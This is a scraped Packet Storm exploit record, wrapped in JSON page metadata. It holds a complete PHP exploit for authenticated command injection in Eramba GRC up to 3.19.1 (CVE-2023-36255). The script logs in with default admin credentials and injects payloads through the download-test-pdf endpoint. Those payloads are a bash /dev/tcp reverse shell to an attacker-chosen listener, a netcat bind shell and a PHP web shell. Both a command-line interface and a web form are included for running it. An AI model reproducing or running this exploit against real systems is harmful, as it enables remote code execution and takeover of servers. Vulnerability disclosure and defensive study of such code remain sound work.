{“lastseen”:”2025-12-12T17:14:43″,”description”:”Eramba GRC platform version 3.19.1 proof of concept command injection exploit…”,”published”:”2025-12-12T00:00:00″,”modified”:”2025-12-12T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Eramba GRC 3.19.1 Command Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:212774″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2023-36255″],”sourceData”:”=============================================================================================================================================\\n | # Title : Eramba GRC platform 3.19.1 Command injection in download-test-pdf endpoint |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.eramba.org\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/190048\/ \\u0026 CVE-2023-36255\\n \\n [+] Summary : \\n \\n Critical authenticated remote code execution vulnerability in Eramba GRC platform (versions up to 3.19.1) \\n \\t\\t\\t allowing command injection through the download-test-pdf endpoint when debug mode is enabled.\\n \\n [+] POC : \\n \\n php poc.php or http:\/\/127.0.0.1\/poc.php \\n \\n \\u003c?php\\n \/*\\n * by : indoushka based on Metasploit module\\n *\/\\n \\n class ErambaExploit {\\n private $target;\\n private $port;\\n private $ssl;\\n private $base_path;\\n private $timeout;\\n private $cookies;\\n private $username;\\n private $password;\\n \\n public function __construct($target, $port = 8443, $ssl = true, $base_path = ‘\/’, $username = ‘admin’, $password = ‘admin’) {\\n $this-\\u003etarget = $target;\\n $this-\\u003eport = $port;\\n $this-\\u003essl = $ssl;\\n $this-\\u003ebase_path = rtrim($base_path, ‘\/’);\\n $this-\\u003etimeout = 30;\\n $this-\\u003ecookies = [];\\n $this-\\u003eusername = $username;\\n $this-\\u003epassword = $password;\\n }\\n \\n \/**\\n * Check if target is vulnerable\\n *\/\\n public function check() {\\n echo \\”[*] Checking Eramba vulnerability…\\\\n\\”;\\n \\n $res = $this-\\u003esend_request(‘\/login’, ‘GET’);\\n \\n if (!$res || $res[‘code’] != 200) {\\n echo \\”[-] Failed to access login page\\\\n\\”;\\n return \\”unknown\\”;\\n }\\n \\n \/\/ Extract version from HTML\\n $version = $this-\\u003eextract_version($res[‘body’]);\\n if (!$version) {\\n echo \\”[-] Could not determine Eramba version\\\\n\\”;\\n return \\”unknown\\”;\\n }\\n \\n echo \\”[*] Detected Eramba version: $version\\\\n\\”;\\n \\n \/\/ Check if debug mode is enabled\\n $debug_enabled = $this-\\u003echeck_debug_mode($res[‘body’]);\\n if (!$debug_enabled) {\\n echo \\”[-] Debug mode is not enabled – target is not vulnerable\\\\n\\”;\\n return \\”safe\\”;\\n }\\n \\n echo \\”[+] Debug mode is enabled\\\\n\\”;\\n \\n \/\/ Check version against vulnerable range\\n if ($this-\\u003eis_version_vulnerable($version)) {\\n echo \\”[+] \u2713 Eramba version $version is vulnerable\\\\n\\”;\\n return \\”vulnerable\\”;\\n } else {\\n echo \\”[-] Eramba version $version is not affected\\\\n\\”;\\n return \\”safe\\”;\\n }\\n }\\n \\n \/**\\n * Extract version from HTML\\n *\/\\n private function extract_version($html) {\\n \/\/ Look for version pattern: \\u003cp\\u003eApp version \\u003cstrong\\u003eX.X.X\\u003c\/strong\\u003e\\n if (preg_match(‘\/App version\\\\s*\\u003cstrong\\u003e([0-9]+\\\\.[0-9]+\\\\.[0-9]+)\\u003c\\\\\/strong\\u003e\/i’, $html, $matches)) {\\n return $matches[1];\\n }\\n return null;\\n }\\n \\n \/**\\n * Check if debug mode is enabled\\n *\/\\n private function check_debug_mode($html) {\\n \/\/ Look for debug token field\\n return strpos($html, ‘name=\\”_Token[debug]\\”‘) !== false;\\n }\\n \\n \/**\\n * Check if version is vulnerable\\n *\/\\n private function is_version_vulnerable($version) {\\n $version_parts = explode(‘.’, $version);\\n $major = intval($version_parts[0]);\\n $minor = intval($version_parts[1]);\\n $patch = intval($version_parts[2]);\\n \\n \/\/ Vulnerable: versions up to 3.19.1\\n if ($major \\u003c 3) return true;\\n if ($major == 3) {\\n if ($minor \\u003c 19) return true;\\n if ($minor == 19 \\u0026\\u0026 $patch \\u003c= 1) return true;\\n }\\n return false;\\n }\\n \\n \/**\\n * Login to Eramba\\n *\/\\n private function login() {\\n echo \\”[*] Attempting to login…\\\\n\\”;\\n \\n \/\/ First GET request to get tokens\\n $res = $this-\\u003esend_request(‘\/login’, ‘GET’, [], null, [], true);\\n \\n if (!$res || $res[‘code’] != 200) {\\n echo \\”[-] Failed to access login page\\\\n\\”;\\n return false;\\n }\\n \\n \/\/ Extract CSRF and token fields\\n $tokens = $this-\\u003eextract_tokens($res[‘body’]);\\n if (!$tokens) {\\n echo \\”[-] Could not extract authentication tokens\\\\n\\”;\\n return false;\\n }\\n \\n echo \\”[*] Extracted CSRF token and form tokens\\\\n\\”;\\n \\n \/\/ Perform login\\n $login_data = [\\n ‘_csrfToken’ =\\u003e $tokens[‘csrf’],\\n ‘login’ =\\u003e $this-\\u003eusername,\\n ‘password’ =\\u003e $this-\\u003epassword,\\n ‘_Token[fields]’ =\\u003e $tokens[‘fields’],\\n ‘_Token[unlocked]’ =\\u003e $tokens[‘unlocked’],\\n ‘_Token[debug]’ =\\u003e $tokens[‘debug’]\\n ];\\n \\n $res = $this-\\u003esend_request(‘\/login’, ‘POST’, [], http_build_query($login_data), [\\n ‘Content-Type: application\/x-www-form-urlencoded’\\n ], true);\\n \\n if (!$res || $res[‘code’] != 200) {\\n echo \\”[-] Login failed – invalid credentials or server error\\\\n\\”;\\n return false;\\n }\\n \\n \/\/ Check if login was successful by looking for dashboard\\n if (strpos($res[‘body’], ‘Landing Dashboard’) !== false) {\\n echo \\”[+] Successfully logged in as {$this-\\u003eusername}\\\\n\\”;\\n return true;\\n } else {\\n echo \\”[-] Login failed – check credentials\\\\n\\”;\\n return false;\\n }\\n }\\n \\n \/**\\n * Extract tokens from HTML form\\n *\/\\n private function extract_tokens($html) {\\n $tokens = [];\\n \\n \/\/ Extract CSRF token\\n if (preg_match(‘\/name=\\”_csrfToken\\”\\\\s+value=\\”([^\\”]+)\\”\/’, $html, $matches)) {\\n $tokens[‘csrf’] = $matches[1];\\n }\\n \\n \/\/ Extract token fields\\n if (preg_match(‘\/name=\\”_Token\\\\[fields\\\\]\\”\\\\s+value=\\”([^\\”]+)\\”\/’, $html, $matches)) {\\n $tokens[‘fields’] = $matches[1];\\n }\\n \\n \/\/ Extract token unlocked\\n if (preg_match(‘\/name=\\”_Token\\\\[unlocked\\\\]\\”\\\\s+value=\\”([^\\”]+)\\”\/’, $html, $matches)) {\\n $tokens[‘unlocked’] = $matches[1];\\n }\\n \\n \/\/ Extract token debug\\n if (preg_match(‘\/name=\\”_Token\\\\[debug\\\\]\\”\\\\s+value=\\”([^\\”]+)\\”\/’, $html, $matches)) {\\n $tokens[‘debug’] = $matches[1];\\n }\\n \\n if (count($tokens) == 4) {\\n return $tokens;\\n }\\n \\n return false;\\n }\\n \\n \/**\\n * Execute the exploit\\n *\/\\n public function exploit($payload_type = ‘reverse_shell’, $lhost = null, $lport = null) {\\n echo \\”[*] Starting Eramba exploitation…\\\\n\\”;\\n \\n \/\/ Step 1: Login\\n if (!$this-\\u003elogin()) {\\n echo \\”[-] Authentication failed\\\\n\\”;\\n return false;\\n }\\n \\n \/\/ Step 2: Generate payload\\n $payload = $this-\\u003egenerate_payload($payload_type, $lhost, $lport);\\n if (!$payload) {\\n echo \\”[-] Failed to generate payload\\\\n\\”;\\n return false;\\n }\\n \\n echo \\”[*] Generated payload: \\” . htmlspecialchars($payload) . \\”\\\\n\\”;\\n \\n \/\/ Step 3: Execute via download-test-pdf endpoint\\n echo \\”[*] Executing payload via download-test-pdf endpoint…\\\\n\\”;\\n \\n $res = $this-\\u003esend_request(‘\/settings\/download-test-pdf’, ‘GET’, [\\n ‘path’ =\\u003e $payload\\n ]);\\n \\n if ($res) {\\n echo \\”[+] \u2713 Payload sent successfully\\\\n\\”;\\n echo \\”[*] Check your listener for connection\\\\n\\”;\\n return true;\\n } else {\\n echo \\”[-] Failed to execute payload\\\\n\\”;\\n return false;\\n }\\n }\\n \\n \/**\\n * Generate payload commands\\n *\/\\n private function generate_payload($type, $lhost, $lport) {\\n switch ($type) {\\n case ‘reverse_shell’:\\n if (!$lhost || !$lport) {\\n echo \\”[-] IP and port required for reverse shell\\\\n\\”;\\n return false;\\n }\\n \/\/ Bash reverse shell\\n return \\”bash -c ‘bash -i \\u003e\\u0026 \/dev\/tcp\/{$lhost}\/{$lport} 0\\u003e\\u00261’\\”;\\n \\n case ‘bind_shell’:\\n if (!$lport) {\\n echo \\”[-] Port required for bind shell\\\\n\\”;\\n return false;\\n }\\n return \\”nc -lvp {$lport} -e \/bin\/bash\\”;\\n \\n case ‘command’:\\n return ‘id; whoami; uname -a; pwd’;\\n \\n case ‘web_shell’:\\n \/\/ This would create a web shell file\\n $filename = $this-\\u003erandom_text(8) . ‘.php’;\\n $web_shell = ‘\\u003c?php if(isset($_REQUEST[\\”cmd\\”])){ system($_REQUEST[\\”cmd\\”]); } ?\\u003e’;\\n return \\”echo ‘{$web_shell}’ \\u003e \/tmp\/{$filename}\\”;\\n \\n default:\\n return ‘id; whoami; hostname’;\\n }\\n }\\n \\n \/**\\n * Send HTTP request\\n *\/\\n private function send_request($path, $method = ‘GET’, $params = [], $data = null, $custom_headers = [], $save_cookies = false) {\\n $url = $this-\\u003ebuild_url($path);\\n \\n if ($method == ‘GET’ \\u0026\\u0026 !empty($params)) {\\n $url .= ‘?’ . http_build_query($params);\\n }\\n \\n $ch = curl_init();\\n curl_setopt_array($ch, [\\n CURLOPT_URL =\\u003e $url,\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_TIMEOUT =\\u003e $this-\\u003etimeout,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n CURLOPT_USERAGENT =\\u003e ‘Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36’,\\n CURLOPT_HEADER =\\u003e true,\\n CURLOPT_CUSTOMREQUEST =\\u003e $method,\\n CURLOPT_FOLLOWLOCATION =\\u003e false\\n ]);\\n \\n \/\/ Add POST data if provided\\n if ($method == ‘POST’ \\u0026\\u0026 $data) {\\n curl_setopt($ch, CURLOPT_POSTFIELDS, $data);\\n }\\n \\n \/\/ Build headers\\n $headers = array_merge([\\n ‘User-Agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36’\\n ], $custom_headers);\\n \\n \/\/ Add cookies if available\\n $cookie_header = $this-\\u003ebuild_cookie_header();\\n if ($cookie_header) {\\n $headers[] = $cookie_header;\\n }\\n \\n curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);\\n \\n $response = curl_exec($ch);\\n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n \\n \/\/ Save cookies if requested\\n if ($save_cookies \\u0026\\u0026 $response) {\\n $this-\\u003eextract_cookies($response);\\n }\\n \\n curl_close($ch);\\n \\n if ($response) {\\n $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);\\n $headers = substr($response, 0, $header_size);\\n $body = substr($response, $header_size);\\n \\n return [\\n ‘code’ =\\u003e $http_code,\\n ‘headers’ =\\u003e $headers,\\n ‘body’ =\\u003e $body\\n ];\\n }\\n \\n return false;\\n }\\n \\n \/**\\n * Extract cookies from response headers\\n *\/\\n private function extract_cookies($response) {\\n if (preg_match_all(‘\/Set-Cookie:\\\\s*([^=]+)=([^;]+)\/i’, $response, $matches)) {\\n for ($i = 0; $i \\u003c count($matches[1]); $i++) {\\n $this-\\u003ecookies[trim($matches[1][$i])] = $matches[2][$i];\\n }\\n }\\n }\\n \\n \/**\\n * Build cookie header from stored cookies\\n *\/\\n private function build_cookie_header() {\\n if (empty($this-\\u003ecookies)) {\\n return null;\\n }\\n \\n $cookie_parts = [];\\n foreach ($this-\\u003ecookies as $name =\\u003e $value) {\\n $cookie_parts[] = \\”{$name}={$value}\\”;\\n }\\n \\n return ‘Cookie: ‘ . implode(‘; ‘, $cookie_parts);\\n }\\n \\n \/**\\n * Generate random text\\n *\/\\n private function random_text($length = 8) {\\n $chars = ‘abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789’;\\n $result = ”;\\n for ($i = 0; $i \\u003c $length; $i++) {\\n $result .= $chars[rand(0, strlen($chars) – 1)];\\n }\\n return $result;\\n }\\n \\n \/**\\n * Build full URL\\n *\/\\n private function build_url($path) {\\n $protocol = $this-\\u003essl ? ‘https’ : ‘http’;\\n $full_path = $this-\\u003ebase_path . $path;\\n return \\”{$protocol}:\/\/{$this-\\u003etarget}:{$this-\\u003eport}{$full_path}\\”;\\n }\\n }\\n \\n \/\/ CLI Interface\\n if (php_sapi_name() === ‘cli’) {\\n echo \\”\\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 Eramba RCE Exploit \u2551\\n \u2551 CVE-2023-36255 \u2551\\n \u2551 PHP Implementation \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n \\n \\\\n\\”;\\n \\n $options = getopt(\\”t:p:s:u:U:P:cL:H:\\”, [\\n \\”target:\\”,\\n \\”port:\\”,\\n \\”ssl\\”,\\n \\”uri:\\”,\\n \\”username:\\”,\\n \\”password:\\”,\\n \\”check\\”,\\n \\”lhost:\\”,\\n \\”lport:\\”\\n ]);\\n \\n $target = $options[‘t’] ?? $options[‘target’] ?? null;\\n $port = $options[‘p’] ?? $options[‘port’] ?? 8443;\\n $ssl = isset($options[‘s’]) || isset($options[‘ssl’]);\\n $base_uri = $options[‘u’] ?? $options[‘uri’] ?? ‘\/’;\\n $username = $options[‘U’] ?? $options[‘username’] ?? ‘admin’;\\n $password = $options[‘P’] ?? $options[‘password’] ?? ‘admin’;\\n $check_only = isset($options[‘c’]) || isset($options[‘check’]);\\n $lhost = $options[‘H’] ?? $options[‘lhost’] ?? null;\\n $lport = $options[‘L’] ?? $options[‘lport’] ?? 4444;\\n \\n if (!$target) {\\n echo \\”Usage: php eramba_exploit.php [options]\\\\n\\”;\\n echo \\”Options:\\\\n\\”;\\n echo \\” -t, –target Target host (required)\\\\n\\”;\\n echo \\” -p, –port Target port (default: 8443)\\\\n\\”;\\n echo \\” -s, –ssl Use SSL (default: true)\\\\n\\”;\\n echo \\” -u, –uri Base URI path (default: \/)\\\\n\\”;\\n echo \\” -U, –username Username (default: admin)\\\\n\\”;\\n echo \\” -P, –password Password (default: admin)\\\\n\\”;\\n echo \\” -c, –check Check only (don’t exploit)\\\\n\\”;\\n echo \\” -H, –lhost Listener host for reverse shell\\\\n\\”;\\n echo \\” -L, –lport Listener port for reverse shell (default: 4444)\\\\n\\”;\\n echo \\”\\\\nExamples:\\\\n\\”;\\n echo \\” php eramba_exploit.php -t 192.168.1.100 -c\\\\n\\”;\\n echo \\” php eramba_exploit.php -t eramba.company.com -U admin -P password -H 10.0.0.5 -L 4444\\\\n\\”;\\n exit(1);\\n }\\n \\n $exploit = new ErambaExploit($target, $port, $ssl, $base_uri, $username, $password);\\n \\n if ($check_only) {\\n $result = $exploit-\\u003echeck();\\n echo \\”\\\\n[*] Result: {$result}\\\\n\\”;\\n } else {\\n if ($exploit-\\u003eexploit(‘reverse_shell’, $lhost, $lport)) {\\n echo \\”[+] Exploitation completed successfully\\\\n\\”;\\n } else {\\n echo \\”[-] Exploitation failed\\\\n\\”;\\n }\\n }\\n \\n } else {\\n \/\/ Web Interface\\n $action = $_POST[‘action’] ?? ”;\\n \\n if ($action === ‘check’ || $action === ‘exploit’) {\\n $target = $_POST[‘target’] ?? ”;\\n $port = $_POST[‘port’] ?? 8443;\\n $ssl = isset($_POST[‘ssl’]);\\n $base_uri = $_POST[‘uri’] ?? ‘\/’;\\n $username = $_POST[‘username’] ?? ‘admin’;\\n $password = $_POST[‘password’] ?? ‘admin’;\\n $payload_type = $_POST[‘payload_type’] ?? ‘command’;\\n $lhost = $_POST[‘lhost’] ?? ”;\\n $lport = $_POST[‘lport’] ?? 4444;\\n \\n if (empty($target)) {\\n echo \\”\\u003cdiv style=’color: red; padding: 10px; border: 1px solid red; margin: 10px;’\\u003eTarget host is required\\u003c\/div\\u003e\\”;\\n } else {\\n $exploit = new ErambaExploit($target, $port, $ssl, $base_uri, $username, $password);\\n \\n ob_start();\\n if ($action === ‘check’) {\\n $exploit-\\u003echeck();\\n } else {\\n $exploit-\\u003eexploit($payload_type, $lhost, $lport);\\n }\\n $output = ob_get_clean();\\n \\n echo \\”\\u003cpre style=’background: #f4f4f4; padding: 15px; border: 1px solid #ddd; border-radius: 4px;’\\u003e$output\\u003c\/pre\\u003e\\”;\\n }\\n \\n echo ‘\\u003ca href=\\”‘ . htmlspecialchars($_SERVER[‘PHP_SELF’]) . ‘\\” style=\\”display: inline-block; padding: 10px 20px; background: #007cba; color: white; text-decoration: none; border-radius: 4px; margin: 10px 0;\\”\\u003eBack to Form\\u003c\/a\\u003e’;\\n \\n } else {\\n \/\/ Display the form\\n echo ‘\\u003c!DOCTYPE html\\u003e\\n \\u003chtml\\u003e\\n \\u003chead\\u003e\\n \\u003ctitle\\u003eEramba RCE Exploit – CVE-2023-36255\\u003c\/title\\u003e\\n \\u003cmeta charset=\\”UTF-8\\”\\u003e\\n \\u003cstyle\\u003e\\n body { \\n font-family: Arial, sans-serif; \\n margin: 0; \\n padding: 20px; \\n background: #f5f5f5;\\n }\\n .container { \\n max-width: 800px; \\n margin: 0 auto; \\n background: white;\\n padding: 30px;\\n border-radius: 8px;\\n box-shadow: 0 2px 10px rgba(0,0,0,0.1);\\n }\\n h1 { \\n color: #333; \\n border-bottom: 2px solid #007cba;\\n padding-bottom: 10px;\\n }\\n h3 {\\n color: #666;\\n }\\n .form-group { \\n margin-bottom: 20px; \\n }\\n label { \\n display: block; \\n margin-bottom: 8px; \\n font-weight: bold;\\n color: #333;\\n }\\n input[type=\\”text\\”], input[type=\\”password\\”], select { \\n width: 100%; \\n padding: 10px; \\n border: 1px solid #ddd; \\n border-radius: 4px; \\n box-sizing: border-box;\\n font-size: 14px;\\n }\\n .checkbox-group {\\n display: flex;\\n align-items: center;\\n gap: 10px;\\n }\\n button { \\n background: #007cba; \\n color: white; \\n padding: 12px 25px; \\n border: none; \\n border-radius: 4px; \\n cursor: pointer; \\n margin-right: 10px;\\n font-size: 16px;\\n transition: background 0.3s;\\n }\\n button:hover {\\n background: #005a87;\\n }\\n .danger { \\n background: #dc3545; \\n }\\n .danger:hover {\\n background: #c82333;\\n }\\n .info { \\n background: #17a2b8; \\n }\\n .info:hover {\\n background: #138496;\\n }\\n .warning-box {\\n background: #fff3cd;\\n border: 1px solid #ffeaa7;\\n color: #856404;\\n padding: 15px;\\n border-radius: 4px;\\n margin: 20px 0;\\n }\\n .info-box {\\n background: #d1ecf1;\\n border: 1px solid #bee5eb;\\n color: #0c5460;\\n padding: 15px;\\n border-radius: 4px;\\n margin: 20px 0;\\n }\\n \\u003c\/style\\u003e\\n \\u003c\/head\\u003e\\n \\u003cbody\\u003e\\n \\u003cdiv class=\\”container\\”\\u003e\\n \\u003ch1\\u003eEramba RCE Exploit\\u003c\/h1\\u003e\\n \\u003ch3\\u003eCVE-2023-36255 – Authenticated Remote Code Execution\\u003c\/h3\\u003e\\n \\n \\u003cdiv class=\\”warning-box\\”\\u003e\\n \\u003cstrong\\u003e\u26a0\ufe0f Educational Use Only:\\u003c\/strong\\u003e This tool demonstrates a critical vulnerability in Eramba.\\n Use only on systems you own or have explicit permission to test.\\n \\u003c\/div\\u003e\\n \\n \\u003cform method=\\”post\\”\\u003e\\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”target\\”\\u003eTarget Host:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”target\\” name=\\”target\\” placeholder=\\”192.168.1.100 or eramba.company.com\\” required\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”port\\”\\u003ePort:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”port\\” name=\\”port\\” value=\\”8443\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”uri\\”\\u003eBase URI:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”uri\\” name=\\”uri\\” value=\\”\/\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003cdiv class=\\”checkbox-group\\”\\u003e\\n \\u003cinput type=\\”checkbox\\” id=\\”ssl\\” name=\\”ssl\\” checked\\u003e\\n \\u003clabel for=\\”ssl\\” style=\\”display: inline; font-weight: normal;\\”\\u003eUse SSL\\u003c\/label\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”username\\”\\u003eUsername:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”username\\” name=\\”username\\” value=\\”admin\\” required\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”password\\”\\u003ePassword:\\u003c\/label\\u003e\\n \\u003cinput type=\\”password\\” id=\\”password\\” name=\\”password\\” value=\\”admin\\” required\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”payload_type\\”\\u003ePayload Type:\\u003c\/label\\u003e\\n \\u003cselect id=\\”payload_type\\” name=\\”payload_type\\”\\u003e\\n \\u003coption value=\\”command\\”\\u003eTest Command\\u003c\/option\\u003e\\n \\u003coption value=\\”reverse_shell\\”\\u003eReverse Shell\\u003c\/option\\u003e\\n \\u003coption value=\\”bind_shell\\”\\u003eBind Shell\\u003c\/option\\u003e\\n \\u003coption value=\\”web_shell\\”\\u003eWeb Shell\\u003c\/option\\u003e\\n \\u003c\/select\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”lhost\\”\\u003eListener Host (for reverse shell):\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”lhost\\” name=\\”lhost\\” placeholder=\\”Your IP address: 192.168.1.100\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”lport\\”\\u003eListener Port (for reverse shell):\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”lport\\” name=\\”lport\\” value=\\”4444\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cbutton type=\\”submit\\” name=\\”action\\” value=\\”check\\” class=\\”info\\”\\u003eCheck Vulnerability\\u003c\/button\\u003e\\n \\u003cbutton type=\\”submit\\” name=\\”action\\” value=\\”exploit\\” class=\\”danger\\”\\u003eExecute Exploit\\u003c\/button\\u003e\\n \\u003c\/form\\u003e\\n \\n \\u003cdiv class=\\”info-box\\”\\u003e\\n \\u003ch3\\u003eAbout CVE-2023-36255:\\u003c\/h3\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eVulnerability:\\u003c\/strong\\u003e Command injection in download-test-pdf endpoint\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eAffected Versions:\\u003c\/strong\\u003e Eramba up to 3.19.1\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003ePrerequisites:\\u003c\/strong\\u003e Debug mode must be enabled\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eAuthentication:\\u003c\/strong\\u003e Requires valid user credentials\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eEndpoint:\\u003c\/strong\\u003e \/settings\/download-test-pdf\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eParameter:\\u003c\/strong\\u003e path (command injection)\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eImpact:\\u003c\/strong\\u003e Authenticated Remote Code Execution\\u003c\/p\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/body\\u003e\\n \\u003c\/html\\u003e’;\\n }\\n }\\n ?\\u003e\\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212774″,”cvss”:{“score”:8.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212774\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-12T17:14:43″,”description”:”Eramba GRC platform version 3.19.1 proof of concept command injection exploit…”,”published”:”2025-12-12T00:00:00″,”modified”:”2025-12-12T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Eramba GRC 3.19.1 Command Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:212774″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2023-36255″],”sourceData”:”=============================================================================================================================================\\n | # Title : Eramba GRC platform 3.19.1 Command…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,41,12,15,13,53,7,11,5],"class_list":["post-30772","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-88","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n